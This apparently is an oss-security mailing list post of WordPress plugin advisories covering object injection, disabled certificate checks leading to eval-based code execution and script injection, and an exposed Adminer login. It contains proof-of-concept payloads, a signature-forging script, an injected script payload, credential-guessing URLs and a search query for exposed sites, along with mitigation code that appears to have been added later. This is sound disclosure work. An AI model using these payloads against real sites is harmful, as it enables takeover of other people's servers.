Date: Wed, 1 Mar 2017 07:17:51 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting various WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.




------------------------------------------------------------------------
Analytics Stats Counter Statistics WordPress Plugin unauthenticated PHP
Object injection vulnerability
------------------------------------------------------------------------
Yorick Koster, June 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in the Analytics Stats
Counter Statistics WordPress Plugin, which can be used by an
unauthenticated user to instantiate arbitrary PHP Objects. Using this
vulnerability it is possible to execute arbitrary PHP code.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160803-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Analytics Stats Counter
Statistics [2] WordPress Plugin version 1.2.2.5.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Analytics Stats Counter Statistics [2] WordPress Plugin analyses
visitor statistics on a WordPress site. A PHP Object injection [3]
vulnerability was found in the plugin, which can be used by an
unauthenticated user to instantiate arbitrary PHP Objects.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue is possible due to an unsafe call to unserialize() in the
wpadm_unpack() function. wpadm_run() passes the value of the
wpadm_<plugin>_request POST parameter straight into it, so the serialized
data is fully attacker-controlled; no authentication check is visible on
this path, as can be seen in the following code fragment:

wpadm.php:

if ( ! function_exists( 'wpadm_run' )) {
	function  wpadm_run($pl, $dir) {
		@set_time_limit(0);
		require_once dirname(__FILE__) . '/class-wpadm-method-class.php';
		$request_name = 'wpadm_'.$pl.'_request';
		if( isset( $_POST[$request_name] ) && ! empty ( $_POST[$request_name] ) ) {
			require_once dirname(__FILE__) . '/class-wpadm-core.php';
			$wpadm = new WPAdm_Core(wpadm_unpack($_POST[$request_name]), $pl, $dir);
			echo '<wpadm>'.wpadm_pack($wpadm->getResult()->toArray()).'</wpadm>';
			exit;
		}
	}
}

if ( ! function_exists( 'wpadm_unpack' )) {
	/**
	 * @param str $str
	 * @return mixed
	 */
	function wpadm_unpack( $str ) {
		return unserialize( base64_decode( $str ) );
	}
}

It has been confirmed that this issue can be used to execute arbitrary
PHP code.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/analytics_stats_counter_statistics_wordpress_plugin_unauthenticated_php_object_injection_vulnerability.html
[2] https://wordpress.org/plugins/stats-counter/
[3] https://www.owasp.org/index.php/PHP_Object_Injection
------------------------------------------------------------------------
Simple Ads Manager WordPress plugin unauthenticated PHP Object injection
vulnerability
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A PHP Object injection vulnerability was found in the Simple Ads Manager
WordPress plugin. It can be used by an unauthenticated user to
instantiate arbitrary PHP Objects. This issue can potentially result in
arbitrary code execution, but this has not been confirmed.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0041

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Simple Ads Manager [2]
WordPress plugin version 2.9.8.125.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Simple Ads Manager [2] WordPress Plugin is an easy to use plugin
providing flexible logic for displaying advertisements. A PHP Object
injection [3] vulnerability was found in the Simple Ads Manager WordPress
plugin, which can be used by an unauthenticated user to instantiate
arbitrary PHP Objects.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue is possible due to two unsafe calls to unserialize() in the
sam-ajax-loader.php file. The input is taken directly from the POST
request as can be seen in the following code fragment:

sam-ajax-loader.php:

if ( in_array( $action, $allowed_actions ) ) {
	switch ( $action ) {
		case 'sam_ajax_load_place':
			echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) );
			break;

		case 'sam_ajax_load_ads':
			if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) {
				$clauses = unserialize( base64_decode( $_POST['wc'] ) );

This issue can potentially result in arbitrary code execution, but this
has not been confirmed.
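Both the Analytics Stats Counter Statistics and the Simple Ads Manager issues come down to the same pattern: unserialize(base64_decode($_POST[...])) on unauthenticated input. The following is an added example (not code from either plugin) showing why that is dangerous and what the hardened unpack looks like. The Logger class is a constructed stand-in for any class a WordPress install happens to have loaded; it is not a gadget from either plugin, and the payload is constructed for the demonstration.

```php
<?php
// Added example, not code from either plugin. Shows the vulnerable unpack beside two
// hardened forms and a detection check. Logger is a constructed class standing in for
// whatever the target install has autoloaded; the payload is constructed as well.

class Logger {
    public $file = 'app.log';
    public $data = '';
    // Magic methods run during unserialize() and at destruction, so attacker-chosen
    // property values reach them without the plugin ever calling the class.
    public function __wakeup() {
        echo "__wakeup: object of class " . get_class($this) . " instantiated\n";
    }
    public function __destruct() {
        echo "__destruct: would write " . strlen($this->data) . " bytes to {$this->file}\n";
    }
}

// Vulnerable form: same behaviour as wpadm_unpack() and sam-ajax-loader.php.
function unpack_vulnerable($str) {
    return unserialize(base64_decode($str));
}

// Hardened form 1: keep the wire format but refuse every object (PHP >= 7.0).
// Objects in the payload become __PHP_Incomplete_Class and no magic method runs.
function unpack_no_objects($str) {
    $raw = base64_decode($str, true);            // strict decode: reject non-base64 input
    if ($raw === false) {
        return null;
    }
    return unserialize($raw, array('allowed_classes' => false));
}

// Hardened form 2: switch the wire format to JSON, which cannot express PHP objects.
function unpack_json($str) {
    $raw = base64_decode($str, true);
    if ($raw === false) {
        return null;
    }
    return json_decode($raw, true);               // associative arrays only
}

// Detection check for a WAF rule or log review: does the blob carry a serialized object?
function contains_serialized_object($str) {
    $raw = base64_decode($str, true);
    // "O:<len>:"<class>"" opens a plain object, "C:" a custom-serialized one.
    return $raw !== false && preg_match('/(^|[;{])[OC]:\d+:"/', $raw) === 1;
}

// Constructed payload, as it would be sent in wpadm_<plugin>_request or wc.
$payload = base64_encode('O:6:"Logger":2:{s:4:"file";s:14:"/tmp/pwned.php";s:4:"data";s:5:"<?php";}');

echo "vulnerable:\n";
$obj = unpack_vulnerable($payload);               // __wakeup fires here
unset($obj);                                      // __destruct fires here

echo "\nhardened (allowed_classes => false):\n";
$obj = unpack_no_objects($payload);
var_dump($obj instanceof __PHP_Incomplete_Class); // bool(true); no magic method ran
unset($obj);

echo "\ndetection:\n";
var_dump(contains_serialized_object($payload));                                // bool(true)
var_dump(contains_serialized_object(base64_encode('a:1:{i:0;s:2:"hi";}')));   // bool(false)
```

Run it with the PHP CLI (7.0 or later for the allowed_classes option). The first section prints the __wakeup and __destruct lines, which is exactly the control an attacker gets over any class with useful magic methods; the hardened forms print nothing from Logger. Neither hardened form needs a change in the client, so long as the client can be updated to send JSON in the second case.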

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/simple_ads_manager_wordpress_plugin_unauthenticated_php_object_injection_vulnerability.html
[2] https://wordpress.org/plugins/simple-ads-manager/
[3] https://www.owasp.org/index.php/PHP_Object_Injection
------------------------------------------------------------------------
VaultPress - Remote Code Execution via Man in The Middle attack
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Man in The Middle (MiTM) vulnerability has been identified in the
VaultPress WordPress plugin. This issue allows an attacker to sniff
clear-text communication and to run arbitrary PHP code on the affected
WordPress host.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160728-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on VaultPress [2] WordPress Plugin
version 1.8.4

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
VaultPress is a WordPress plugin that enables you to easily back up your
WordPress installation to the VaultPress cloud. In addition it offers
various security features, scanning your WordPress system for potential
security issues.

A Man in The Middle (MiTM) vulnerability was found in the VaultPress [2]
WordPress plugin. This issue allows an attacker to sniff clear-text
communication and to run arbitrary PHP code on the affected WordPress
host.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Although SSL is used to communicate with the VaultPress backend
(www.vaultpress.com [3]), the server's SSL certificate is not verified.
An attacker who can intercept the connection can therefore present any
certificate, read the traffic in clear text and, as described below, run
arbitrary PHP code on the affected WordPress host.

The VaultPress plugin communicates with the https://www.vaultpress.com
backend during registration, backups, etcetera. Because the SSL
certificate is not verified, a Man in The Middle can intercept, read and
modify this traffic.

From a code perspective, when the query() method of the
VaultPress_IXR_SSL_Client class is called and the WP_Http class has been
defined, the sslverify attribute is set to false.

The vulnerable code in the
vaultpress/class.vaultpress-ixr-ssl-client.php file is listed below:


[..]
		if ( class_exists( 'WP_Http' ) ) {
			$args = array(
				'method' => 'POST',
				'body' => $xml,
				'headers' => $this->headers,
-->				'sslverify' => false,
				);
			if ( $this->timeout )
[..]


There are a number of ways a Man in The Middle can exploit this issue to
execute arbitrary code on a vulnerable WordPress host running
VaultPress.
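Since no fix is available, a site owner has two practical options: override the plugin's setting from outside it, and check whether other installed plugins do the same thing. The following is an added example, not VaultPress code. It assumes WordPress's add_filter() and the 'http_request_args' filter (which WP_Http::request() applies after merging the caller's arguments) for the first part; the audit function uses nothing from WordPress and runs from the CLI against any directory.

```php
<?php
// Added example, not VaultPress code. (1) A must-use plugin snippet that forces
// certificate verification for requests to vaultpress.com, overriding the plugin's
// 'sslverify' => false. (2) An audit that lists every 'sslverify' => false in a tree.
// Assumption: the plugin only talks to hosts under vaultpress.com (the advisory names
// www.vaultpress.com); widen or drop the host check if you want this site-wide.

// (1) Mitigation. WP_Http::request() runs 'http_request_args' after merging the caller's
// arguments, so a late-priority filter wins over the plugin's own sslverify=false.
if (function_exists('add_filter')) {
    add_filter('http_request_args', function ($args, $url) {
        $host = (string) parse_url($url, PHP_URL_HOST);
        if (substr($host, -14) === 'vaultpress.com') {
            $args['sslverify'] = true;   // verify chain and hostname with WP's CA bundle
        }
        return $args;
    }, 99, 2);
}

// (2) Audit. Returns array of [path, line number, source line] for every PHP file
// under $dir that disables certificate verification.
function find_sslverify_false($dir) {
    $hits = array();
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if ($file->getExtension() !== 'php') {
            continue;
        }
        $lines = file($file->getPathname());
        if ($lines === false) {
            continue;
        }
        foreach ($lines as $no => $line) {
            // Matches 'sslverify' => false and "sslverify"=>FALSE with any spacing;
            // the \b keeps identifiers such as false_positive from matching.
            if (preg_match('/[\'"]sslverify[\'"]\s*=>\s*false\b/i', $line)) {
                $hits[] = array($file->getPathname(), $no + 1, trim($line));
            }
        }
    }
    return $hits;
}

// CLI use: php audit-sslverify.php /path/to/wp-content/plugins
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    foreach (find_sslverify_false($argv[1]) as $hit) {
        list($path, $line, $code) = $hit;
        echo "$path:$line: $code\n";
    }
}
```

Dropping the host check makes the filter site-wide, which is the stronger setting but will also surface any plugin that relied on an unverified connection to an internal or self-signed endpoint; the audit output tells you in advance which files those are.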

------------------------------------------------------------------------
Attack vector targeting vulnerable instance during registration using
PHP's eval() function
------------------------------------------------------------------------
If the MiTM attack is executed during registration (which happens only
once), the secret returned by the VaultPress server can be intercepted.
Once obtained, the secret can be used to communicate with the VaultPress
API exposed by the WordPress host.

For example, the following VaultPress API method runs any PHP code
supplied in the request via eval().


[..]
		switch ( $_GET['action'] ) {
			default:
				die();
				break;
-->			case 'exec':
-->				$code = $_POST['code'];
				if ( !$code )
					$this->response( "No Code Found" );
-->				$syntax_check = @eval( 'return true;' . $code );
				if ( !$syntax_check )
					$this->response( "Code Failed Syntax Check" );
				$this->response( eval( $code . ';' ) );
				die();
				break;
[..]

The above code can be triggered using the following request:

POST /wp-load.php?vaultpress=true&action=exec HTTP/1.1
Host: <target>
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
	
code=phpinfo();&signature=5f3db7516912e6b30422a17c1d0bf49beedd6de8:

Please note that a valid signature is required. To create it, the secret
value is needed, which seems to be exchanged during registration only.
So this only affects installations that were targeted by a MiTM during
registration.

The following little PHP script can be used to create the signature:

<?php
/**
 ** Generate VaultPress API signature using MiTM'd secret
 **/

$secret = "MITMD SECRET HERE";             // secret intercepted during registration
$uri    = "?vaultpress=true&action=exec";  // query string of the API request
$sig    = ":";
$post   = array(
	'code' => "phpinfo();",                // POST body that is signed
);

ksort( $post );                            // keys are sorted before serialization
$sig     = explode( ':', $sig );
$to_sign = serialize( array( 'uri' => $uri, 'post' => $post ) );
// HMAC-SHA1 over the serialized request plus a ':' separator, keyed with the secret
$signature = hash_hmac( 'sha1', "$to_sign:", $secret );

echo "Signature :". $signature;
?>

------------------------------------------------------------------------
Attack vector targeting vulnerable instance after registration using
script injection
------------------------------------------------------------------------
If a MiTM attack is launched against a host which is already registered,
the secret value cannot be intercepted. However, during any
communication initiated by a user from the VaultPress plugin page (for
example during backups), messages are exchanged between the WordPress
host and the vaultpress.com backend.

Responses from the server lack any encoding when shown in the plugin's
dashboard HTML pages. This allows a MiTM to inject scripting code in the
target user's WordPress Admin panel. Effectively this allows an attacker
to take over the WordPress admin account or to (indirectly) run
arbitrary PHP code on the WordPress host.

An example of objects lacking output encoding are the ui_message
objects. The vulnerable code in the vaultpress/vaultpress.php file is as
follows:

		<div id="vp-notice" class="vp-notice vp-<?php echo $type; ?> wrap clearfix">
			<div class="vp-message">
-->				<h3><?php echo $heading; ?></h3>
-->				<p><?php echo $message; ?></p>
			</div>
		</div>


To exploit this, the following XML-RPC fault response can be returned to
the plugin by a MiTM attacker in reply to an API call. Note the scripting
code in the faultString field.


<?xml version="1.0"?>
<methodResponse>
	<fault>
		<value>
			<struct>
				<member>
				   <name>faultCode</name>
				   <value><int>-5</int></value>
				</member>
				<member>
				   <name>faultString</name>
-->				   <value><string><![CDATA[<script>alert("XSS");</script>]]></string></value>
				</member>
			</struct>
		</value>
	</fault>
</methodResponse>
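To make the output-encoding point concrete, the following added example (not VaultPress code) parses a fault response of the shape above and renders the vp-notice markup twice: once with the plugin's echo pattern and once with every server-controlled value escaped. It assumes WordPress's esc_html() where available and falls back to htmlspecialchars() for a stand-alone run; the set of allowed notice types is an assumption for the example.

```php
<?php
// Added example, not VaultPress code. Parses an XML-RPC fault and renders the notice
// unsafely (as vaultpress.php does) and safely. esc_html() is WordPress's; the fallback
// is assumed so the file also runs from the CLI. The fault XML is constructed.

if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Extract faultCode/faultString from a <methodResponse><fault> body.
// LIBXML_NONET stops the parser from fetching external resources; entities stay unexpanded.
function parse_xmlrpc_fault($xml) {
    $doc = @simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    if ($doc === false || !isset($doc->fault)) {
        return null;
    }
    $fault = array();
    foreach ($doc->fault->value->struct->member as $member) {
        $name = (string) $member->name;
        $val  = $member->value;
        // A fault struct only carries <int> and <string> values.
        $fault[$name] = isset($val->int) ? (int) $val->int : (string) $val->string;
    }
    return $fault;
}

// Vulnerable rendering: the same echo pattern as vaultpress.php.
function render_notice_unsafe($type, $heading, $message) {
    return '<div id="vp-notice" class="vp-notice vp-' . $type . ' wrap clearfix">'
         . '<div class="vp-message"><h3>' . $heading . '</h3><p>' . $message . '</p></div></div>';
}

// Hardened rendering: text values are escaped for an HTML text context and the class
// fragment is taken from an allow-list instead of the response.
function render_notice_safe($type, $heading, $message) {
    $allowed = array('error', 'warning', 'success', 'notice');  // assumed set of notice types
    $type = in_array($type, $allowed, true) ? $type : 'notice';
    return '<div id="vp-notice" class="vp-notice vp-' . $type . ' wrap clearfix">'
         . '<div class="vp-message"><h3>' . esc_html($heading) . '</h3><p>' . esc_html($message) . '</p></div></div>';
}

// Constructed MiTM response, same shape as the fault shown in the advisory.
$response = <<<XML
<?xml version="1.0"?>
<methodResponse><fault><value><struct>
  <member><name>faultCode</name><value><int>-5</int></value></member>
  <member><name>faultString</name><value><string><![CDATA[<script>alert("XSS");</script>]]></string></value></member>
</struct></value></fault></methodResponse>
XML;

$fault = parse_xmlrpc_fault($response);
echo render_notice_unsafe('error', 'Backup failed', $fault['faultString']), "\n";
// ...<p><script>alert("XSS");</script></p>...  executes in the administrator's browser
echo render_notice_safe('error', 'Backup failed', $fault['faultString']), "\n";
// ...<p>&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;</p>...  shown as text
```

The same escaping applies to $type: because it lands inside an attribute value rather than text, escaping alone is the weaker choice there, which is why the safe version restricts it to known values instead.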

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/vaultpress___remote_code_execution_via_man_in_the_middle_attack.html
[2] https://wordpress.org/plugins/vaultpress/
[3] https://www.vaultpress.com
------------------------------------------------------------------------
WordPress Adminer plugin allows public (local) database login
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
The Adminer WordPress plugin exposes its Adminer editor login page to
the public, without requiring a WordPress login. As a result an attacker
can attempt to connect to any database running on the local host or on
internal systems which are accessible from the target WordPress server.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160728-0001

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Adminer [2] WordPress Plugin
version 1.4.4.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Currently no fix for this issue is available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Adminer WordPress plugin is a full-featured MySQL management tool
based on the Adminer project [3]. The plugin allows fast database
management for WordPress admins. After installation of the plugin your
database can be managed easily from within the WordPress Dashboard via
the Tools -> Adminer menu option. This issue allows an attacker to
connect to any database running on the local host or on internal systems
which are accessible from the target WordPress server.

Please note that an attacker still needs to login (for example using
username and password) to the target database. However, many site owners
probably do not know or do not expect that anyone out there can try to
login by using various password combinations to their (local) WordPress
database. Often local or internal databases have weak credentials
assigned to them.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists because the Adminer WordPress plugin exposes a
publicly accessible interface (the Adminer editor) that anyone on the
web can use to authenticate against the site's database directly. No
login to the WordPress dashboard is required. The Adminer editor
component appears to have been added about 5 months before this advisory
was written.

An attacker can also specify the host:port combination of the database
to connect to, which allows them to connect to any database running on
the local host or on internal systems which are accessible from the
target WordPress server.

The script has a measure in place to limit brute-force attacks: after 30
connection attempts from a single IP address, that address is blocked
for 30 minutes. This is a per-IP limit and does not stop guessing spread
over many source addresses.

The script can be found at the following location (change URL to your
WordPress site):
http://wp-site.com/wp-content/plugins/adminer/inc/editor/index.php

Using Google many sites can be found that have a publicly accessible
database login page exposed:
https://www.google.nl/search?q=inurl:/adminer/inc/ [4]
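With no fix available, the practical mitigation is to put WordPress's own authentication in front of the editor. The following added example (not part of the Adminer plugin) is a guard to place at the top of inc/editor/index.php. It assumes the default layout wp-content/plugins/adminer/inc/editor/ for the relative path to wp-load.php, and assumes that Adminer's login form posts the database host as auth[server] (the GET parameter server is the one shown in the proof of concept); adjust both if your install differs.

```php
<?php
// Added example, not part of the Adminer plugin: access guard for the top of
// inc/editor/index.php. Assumptions: default plugin layout (five levels below the
// WordPress root) and Adminer's login form field auth[server]; the GET parameter
// server is the one the proof of concept uses. Denying the path in the web server
// configuration achieves the same for the unauthenticated case.

$wp_load = dirname(__FILE__) . '/../../../../../wp-load.php';
if (!is_file($wp_load)) {
    // Fail closed: never serve the editor if WordPress cannot be bootstrapped.
    header('HTTP/1.1 403 Forbidden');
    exit('wp-load.php not found; refusing to expose the database editor.');
}
require_once $wp_load;   // bootstraps WordPress, including the login cookie check

// Anonymous visitors are sent to wp-login.php and returned here afterwards.
if (!is_user_logged_in()) {
    auth_redirect();
    exit;
}

// Logged-in users still need the capability that grants the Tools -> Adminer menu.
if (!current_user_can('manage_options')) {
    wp_die('You are not allowed to use the database editor.', 'Forbidden', array('response' => 403));
}

// Optional: limit connections to the site's own database host, which removes the
// internal-network pivot described above even for administrators.
$requested = '';
if (isset($_GET['server'])) {
    $requested = (string) $_GET['server'];
} elseif (isset($_POST['auth']['server'])) {
    $requested = (string) $_POST['auth']['server'];   // assumed Adminer login form field
}
if ($requested !== '' && $requested !== DB_HOST) {
    wp_die('Connections are limited to ' . esc_html(DB_HOST) . '.', 'Forbidden', array('response' => 403));
}

// The original Adminer editor code follows below this guard.
```

The guard changes nothing for an administrator using Tools -> Adminer, whose session cookie already satisfies is_user_logged_in(); every other request to the editor URL ends at the login page or a 403. The host restriction is worth keeping even after a plugin fix, since the host:port field is what turns a database login page into a scanner for internal systems.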

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
- http://<target>/wp-content/plugins/adminer/inc/editor/index.php
- http://<target>/wp-content/plugins/adminer/inc/editor/index.php?server=10.0.0.1&username=root&db=wordpress&password=root

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/wordpress_adminer_plugin_allows_public__local__database_login.html
[2] https://wordpress.org/plugins/adminer/
[3] https://www.adminer.org/en/editor/
[4] https://www.google.nl/search?q=inurl:/adminer/inc/
